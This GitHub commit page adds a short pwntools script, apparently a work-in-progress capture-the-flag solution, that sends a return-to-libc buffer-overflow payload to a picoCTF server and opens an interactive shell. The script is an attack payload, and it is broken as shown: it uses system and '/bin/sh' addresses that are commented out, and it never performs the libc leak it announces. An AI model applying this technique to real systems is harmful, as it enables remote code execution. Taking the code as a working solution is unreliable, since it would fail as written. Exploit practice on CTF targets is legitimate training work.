File tree Expand file tree Collapse file tree 1 file changed +23
-0
lines changed Expand file tree Collapse file tree 1 file changed +23
-0
lines changed Original file line number Diff line number Diff line change 1+ from pwn import *
2+ padding = b'@' * (0x80 + 8 )
3+ #system_addr = p64(0x7ffff7a334e0)
4+ #exit_addr = p64(0x7ffff7a271d0)
5+ #bin_sh_addr = p64(0x7ffff79e4000 + 0x1b40fa)
6+ # first, leak libc base
7+ r = remote ('mercury.picoctf.net' , 42072 )
8+ pop_rdi_gadget = p64 (0x0000000000400913 )
9+ ret_gadget = p64 (0x000000000040052e )
10+ e = ELF ('./vuln' )
11+ puts_got = e .got ['puts' ]
12+ puts_plt = e .plt ['puts' ]
13+ # leak
14+ r .sendline ()
15+ #r = remote('mercury.picoctf.net', 42072)
16+ #r = process('./vuln_patched')
17+ # maybe @ (ascii 0x40) instead of 'a' (ascii 0x61) will help with alignment?
18+ payload = padding + pop_rdi_gadget + bin_sh_addr + ret_gadget + system_addr
19+ #with open('payload', 'wb') as f:
20+ # f.write(payload+b'\n')
21+ r .sendline (payload )
22+ r .interactive ()
23+
You can’t perform that action at this time.
0 commit comments